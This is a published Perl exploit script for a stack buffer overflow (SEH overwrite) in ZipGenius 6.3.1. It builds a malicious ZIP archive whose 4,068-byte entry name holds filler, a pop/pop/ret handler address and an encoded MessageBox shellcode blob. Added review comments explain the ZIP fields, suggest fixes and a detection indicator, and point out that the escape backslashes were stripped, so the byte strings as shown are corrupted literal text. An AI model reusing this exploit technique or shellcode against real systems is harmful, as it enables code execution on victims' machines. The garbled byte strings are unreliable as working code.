
# Title : ZipGenius zgtips.dll Stack Buffer Overflow
# Published : 2010-04-21
# Author : corelanc0d3r


# Exploit Title : ZipGenius zgtips.dll Stack Buffer Overflow
# Corelan       : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-029
# Date          : April 21st, 2010
# Author        : corelanc0d3r, mr_me and rick2600
# Bug found by  : rick2600
# Software Link : http://www.zipgenius.com/
# Version       : v6.3.1.2552
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH overwrite
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes.
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
#
# Code :
# Banner.
# NOTE(review): in this copy the escape backslashes appear to have been stripped
# by whatever rendered the page ("|n" where "|\n" was meant, "x50x4B" where
# "\x50\x4B" was meant), so as pasted every string below is literal text, not
# the intended bytes. The code is left exactly as published.
print "|------------------------------------------------------------------|n";
print "|                         __               __                      |n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |n";
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |n";
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |n";
print "|                                                                  |n";
print "|                                       http://www.corelan.be:8800 |n";
print "|                                                                  |n";
print "|-------------------------------------------------[ EIP Hunters ]--|n";
print " [+] Exploit for ZipGenius v6.3.1.2552n";
print " [+] Preparing payload...n";

# Output archive name. It is interpolated into a shell command and a two-arg
# open() below, which is only safe because it is a constant.
my $filename="zipgenius.zip";

# ZIP local file header ("PK\x03\x04" signature). The one field the author
# annotates is the two-byte entry-name length: 0x0fe4 = 4068, which equals
# length($payload) once ".txt" is appended below. The overlong entry *name*,
# not file data, is what the vulnerable parser receives.
my $ldf_header = "x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .# entry-name length 0x0fe4 = 4068 (author: "file size: don't change")
"x00x00x00";

# ZIP central-directory file header ("PK\x01\x02" signature, 46 bytes). Same
# entry-name length as the local header; sizes and CRC are zero (no file data).
my $cdf_header = "x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f". # entry-name length 0x0fe4 = 4068 (author: "file size: don't change")
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

# End-of-central-directory record ("PK\x05\x06" signature, one entry). The two
# sizes are consistent with the headers above plus a 4068-byte name.
my $eofcdf_header = "x50x4Bx05x06x00x00x00x00x01x00x01x00".
"x12x10x00x00". # central-directory size: 0x1012 = 4114 = 46 + 4068
"x02x10x00x00". # central-directory offset: 0x1002 = 4098 = 30 + 4068
"x00x00";

# Corelan Team MessageBox 
# Published shellcode blob, reproduced byte-for-byte from the page and not
# decoded here. Detection note: the blob is static, so matching on it is easy
# but brittle; the durable indicator of this file is an archive entry name of
# ~4 KB, far beyond any legitimate path length.
my $shellcode =
"x89xe5xdbxd3xd9x75xf4x5dx55x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x49x49x4ax4bx4fx6bx4ax79x51x64" .
"x51x34x49x64x45x61x48x52x4dx62x50x7ax44x71" .
"x4bx79x45x34x4ex6bx44x31x46x50x4ex6bx44x36" .
"x46x6cx4ex6bx50x76x47x6cx4ex6bx51x56x46x68" .
"x4ex6bx51x6ex45x70x4ex6bx44x76x45x68x42x6f" .
"x44x58x44x35x49x63x43x69x45x51x4bx61x49x6f" .
"x4dx31x45x30x4ex6bx50x6cx45x74x47x54x4cx4b" .
"x43x75x47x4cx4cx4bx46x34x45x55x44x38x47x71" .
"x49x7ax4cx4bx42x6ax47x68x4ex6bx50x5ax45x70" .
"x43x31x4ax4bx4bx53x50x37x42x69x4cx4bx46x54" .
"x4cx4bx43x31x48x6ex50x31x49x6fx45x61x49x50" .
"x49x6cx4ex4cx4fx74x4fx30x50x74x44x4ax4ax61" .
"x48x4fx46x6dx43x31x4fx37x4bx59x4ax51x4bx4f" .
"x4bx4fx49x6fx45x6bx51x6cx46x44x44x68x44x35" .
"x49x4ex4ex6bx42x7ax51x34x43x31x4ax4bx45x36" .
"x4ex6bx44x4cx42x6bx4cx4bx50x5ax47x6cx43x31" .
"x48x6bx4ex6bx46x64x4ex6bx47x71x4ax48x4fx79" .
"x50x44x46x44x45x4cx50x61x4ax63x4fx42x46x68" .
"x45x79x4ax74x4fx79x4dx35x4bx39x4bx72x42x48" .
"x4cx4ex42x6ex46x6ex48x6cx43x62x4dx38x4fx6c" .
"x4bx4fx4bx4fx49x6fx4dx59x42x65x44x44x4fx4b" .
"x51x6ex49x48x4bx52x50x73x4ex67x45x4cx46x44" .
"x50x52x4bx58x4ex6bx49x6fx49x6fx4bx4fx4ex69" .
"x42x65x44x48x50x68x50x6cx42x4cx45x70x49x6f" .
"x45x38x44x73x46x52x46x4ex50x64x51x78x42x55" .
"x50x73x51x75x42x52x4cx48x51x4cx47x54x47x7a" .
"x4fx79x4bx56x42x76x4bx4fx42x75x43x34x4cx49" .
"x49x52x42x70x4fx4bx4ex48x4ex42x50x4dx4dx6c" .
"x4fx77x45x4cx51x34x50x52x4ax48x51x4ex4bx4f" .
"x4bx4fx4bx4fx45x38x42x78x45x70x47x50x45x70" .
"x51x78x46x34x42x45x51x71x42x4dx45x38x42x4c" .
"x50x61x50x6ex45x70x43x58x50x43x50x6fx42x52" .
"x43x55x46x51x4bx6bx4fx78x51x4cx45x74x44x4c" .
"x4cx49x49x73x43x58x46x38x47x50x45x70x47x50" .
"x43x58x44x34x43x59x42x4fx50x6ex51x78x43x48" .
"x50x65x43x53x51x65x45x38x50x64x45x35x45x70" .
"x50x45x50x68x50x6fx47x50x47x33x50x6fx43x58" .
"x50x6cx45x35x51x30x43x44x51x78x42x45x50x72" .
"x45x31x50x62x43x58x50x56x44x35x42x4cx42x4e" .
"x45x61x49x59x4dx58x42x6cx51x34x45x4cx4bx39" .
"x48x61x50x31x4bx62x43x62x51x43x46x31x46x32" .
"x49x6fx4ex30x46x51x4bx70x42x70x49x6fx42x75" .
"x46x68x44x4ax41x41";



# --- payload ---
# Entry-name layout: 1060 filler bytes, the 4-byte next-SEH slot, the 4-byte
# handler address (author: "p/p/r UNIVERSAL" — presumably a pop/pop/ret inside
# the product's own module, i.e. an address that does not move between OS
# builds), then the shellcode, padded with "D" to $size and suffixed ".txt".
# Defensive reading: a fixed-size buffer receives an unbounded entry name, and
# the fact that a hard-coded handler address is enough implies the module was
# built without SafeSEH/ASLR; bounding the copy and enabling those mitigations
# are the fix on the product side.
my $size=4064;
my $junk = "A" x 1060;
my $nseh="xEBx06x90x90";
my $seh=pack("V", 0x0295131C); # p/p/r UNIVERSAL
my $payload = $junk.$nseh.$seh.$shellcode;
my $rest = "D" x ($size - length($payload));
$payload = $payload . $rest. ".txt";    


# Emit the archive: local header + name, central-directory header + the same
# name, EOCD. The name is written twice so whichever header the parser reads
# sees the oversized entry.
# NOTE(review): `system("del $filename")` spawns a shell and is Windows-only;
# `unlink $filename` does the same without one. open() is the unchecked two-arg
# bareword form — a failed open is silently ignored and the print goes nowhere;
# `open my $fh, '>:raw', $filename or die "open $filename: $!"` is the checked
# form, and ':raw'/binmode matters on Windows, where a text-mode handle rewrites
# any 0x0A byte as CRLF and would corrupt the bytes above.
print "Size : " . length($payload)."n";
print "Removing old $filename filen";
system("del $filename");
print "Creating new $filename filen";
open(FILE, ">$filename");
print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE);